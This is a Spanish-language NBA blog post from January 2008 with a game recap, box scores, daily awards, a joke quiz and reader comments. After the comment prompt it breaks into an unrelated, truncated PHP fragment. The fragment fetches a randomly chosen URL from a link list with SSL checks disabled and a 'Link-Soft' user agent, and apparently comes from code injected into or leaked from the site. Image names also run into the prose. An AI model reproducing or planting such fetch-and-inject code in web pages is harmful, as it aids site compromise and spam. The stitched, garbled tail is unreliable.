La crónica (27/01/08)

28 de January de 2008 por MagicJohnson32

Como casi cada domingo, los partidos empezaron muy pronto (a las 13 horas de la costa Este, 19 horas en España). La jornada deparó, ante todo, mucha emoción, ya que nueve de los diez encuentros se resolvieron con diferencias inferiores a los 10 puntos y siete de ellos, por 3 puntos o menos. Llama también la atención que la anotación más alta fueron los 106 puntos de los Warriors. Veamos, antes de la crónica, un resumen en imágenes:

 

La crónica:

turkoglubuzzercelticsEsta vez salió cruz para los Celtics. Tras ganar agónicamente a los Wolves, Boston visitó a Orlando sin Garnett. Los Magic dominaron pero los Celtics volvieron a remontar y lograron empatar con un triple de Allen a falta de 14 segundos; pero Turkoglu dio el triunfo a su equipo con otro triple sobre la bocina en lo que supuso la quinta derrota de Boston este mes. Menos emoción tuvo el triunfo de los Suns en Chicago, en un partido de anotación sorprendentemente baja decidido por la inspiración de Barbosa y la solidez de Stoudemire. No sirvieron para los Bulls los 31 puntos de un Hinrich que rinde mucho más sin Deng y Gordon, ausentes por sendas lesiones. A continuación de estos partidos se disputó el Cavs-Lakers, en el que las dos estrellas brillaron (41-9-4 de LeBron, 33-12-6 de Kobe) y en el que sentenció el acierto final de James y los errores de Lakers en las últimas jugadas. Otra gran actuación que se fue al traste resultó la de Caron Butler, autor de 40 puntos, 8 rebotes y 5 robos, y máximo responsable de que los Wizards forzasen la prórroga en Milwaukee. Sin embargo, los locales se recuperaron tras dejarse remontar 11 puntos en el tramo final y se impusieron en el tiempo extra de nuevo con Charlie Bell supliendo magistralmente a Michael Redd.

La historia entre Hawks y Blazers se repitió apenas 6 días después de que Outlaw diese el triunfo a Portland a falta de 1 segundo en el último enfrentamiento entre ambos equipos. Esta vez fue Roy quien, con 6 puntos en los últimos 2:30, incluyendo un tiro libre a 2 segundos para el final, fue capazaljeffnetsmchale de superar la fiebre que sufría y dar otra victoria a los Blazers. En Dallas, Nowitzki logró 32 puntos y 14 de los últimos 16 de su equipo para superar a los Nuggets, que siguen sin poder contar con Carmelo. Los Wolves lograron su octavo triunfo gracias a los 40 puntos y 19 rebotes de Al Jefferson a costa de unos Nets que no levantan cabeza y anoche se dejaron remontar 14 puntos en el último cuarto y 7 en los últimos 75 segundos de juego.

Los Jazz aprovecharon la ausencia de Yao para vencer a los Rockets con 17 puntos de un Korver que ha encajado bien en su nuevo equipo. Los Knicks no pudieron completar con un triunfo su buen partido ante los Warriors, en los que además de los más de 20 puntos anotados por Ellis, Davis y Jackson, sobresalió Biedrins con 26 rebotes, la cifra más alta lograda esta temporada. Por último, los Sonics volvieron a perder un partido decidido en los últimos segundos, esta vez ante Kevin Martin y sus Kings. Después de un triple de Wilkins para empatar a falta de 0:06 para el final, Martin recorrió la pista, estuvo a punto de perder la posesión, y se elevó para anotar sobre la bocina y hundir a los de Seattle, que ya suman 14 derrotas seguidas.

Box-scores:

Celtics 93 – 96 Magic

Suns 88 – 77 Bulls

Cavs 98 – 95 Lakers

Wizards 102 – 105 Bucks

Hawks 93 – 94 Blazers

Nets 95 – 98 Wolves

Nuggets 85 – 90 Mavs

Jazz 97 – 89 Rockets

Kings 103 – 101 Sonics

Knicks 104 – 106 Warriors

Seguimos con los premios:andrisbiedrinsknicks

Nuestro MVP: 41 puntos de LeBron, 40 de Caron Butler y Al Jefferson, 35 de Richard Jefferson, 33 de Kobe Bryant… Tenemos variedad para elegir MVP, pero demostrando que los puntos no lo son todo, nuestro jugador del día es Andris Biedrins que recogió ¡26 rebotes! en la victoria de los Warriors frente los Knicks.

El rookie: Al Horford sigue siendo el titular de los Hawks y él sigue demostrando que es merecedor de esa posición: 9 puntos y 12 rebotes logró anoche.

La sorpresa: Luis Scola demuestra cada vez que tiene oportunidad que posee la calidad suficiente para hacerce un hueco en la mejor liga del mundo. En ausencia de Yao Ming firmó 18 puntos y 6 rebotes.

La decepción: Podría ser Mehmet Okur o Ray Allen o los compañeros de equipo de Kobe Bryant o la plantilla de los Bulls. Pero hoy, y sin que sirva de precedente, la decepción del día es un rookie. Hay partidos de Kevin Durant que te hacen desear sentarlo en el banquillo muchos, muchos minutos: 19 puntos, sí, pero con un 5 de 20. Por favor, que alguien le enseñe ya a seleccionar mejor sus tiros.

Pasatiempos:

staplescenterlalcavs¿Por qué hubo de detenerse el juego anoche en el Staples Center?

A) Kobe se encadenó a una canasta y se negó a jugar hasta que se recupere Bynum

B) Kobe se encadenó a una canasta y se negó a jugar hasta que Odom meta más de 20 puntos en un partido

C) Kobe y LeBron se encadenaron y se negaron a jugar si no es en el mismo equipo

D) Kwame Brown rompió el aro al lanzar un tiro libre

E) El FBI acudió a investigar la repentina desaparición de Lamar Odom

F) Una fuga de agua provocó un charco en el parquet

Respuesta correcta: F, el juego estuvo detenido durante algo más de diez minutos. Pudo haber sido la E, pero nadie se preocupó de que a Odom, que logró 8 puntos con 4 de 4 en lanzamientos en el primer cuarto, no se le volviese a ver en todo el partido. Suponemos que en L.A. ya están acostumbrados a que esto ocurra.

El ganador se llevará el libro “Los mejores técnicas para desaparecer ante 20.000 personas”, por Lamar Odom, que incluye un DVD con todos los partidos desde la lesión de Andrew Bynum.

Para acabar os dejamos con las 10 mejores jugadas de la pasada madrugada:

 

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Menudo temporadón de Turkoglu, que además es el 2º jugador que mas anota en el último cuarto, solo por detrás de Lebron.

    Y a Durant lo que le habria venido bien es(como mínimo), otro añito en la universidad.

      Citar

  2. MagicJohnson32 dice:
    #2

    Lo de Turkoglu es impresionante, sí señor, porque además hace de todo. Es el base del equipo, el jugador que asume responsabilidades, rebotea y anota. No me lo esperaba de él pero ha asumido el protagonismo necesario, supongo que en parte por la floja temporada de los bases y en parte porque Rashard lleva tiempo tocado de la espalda. Una lástima que tenga tan difícil el All-Star porque se lo merecería.

    Ah, y el que tiene pinta de ser un líder con todas las letras es Roy. Vaya temporada…

      Citar

  3. RusticoColorao dice:
    #3

    Roy ha hecho lo contrario de Durant…quedarse todo el ciclo universitario y si se tiene calidad, que en los dos casos es obvia, se puede rendir desde el primer día.
    Sobre Turkoglu…lo que tiene una buena charla de Txusma con el chaval…es comentarle dos cosas y se pone a jugar el tío.

      Citar

  4. telekoman dice:
    #4

    A Durant lo que le haría falta es una buena charla de su entrenador. Pero claro, viendo lo que hay en Seattle a ver quien es el guapo que le dice que o selecciona los tiros o le manda al banquillo. Pero es una pena. Si se acostumbra a hacer eso va a terminar siendo un Crawford como otro cualquiera.

    Lo de Roy es otra cosa totalmente distinta. El chico parece que tiene algo en la cabeza y no sólo hueco.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>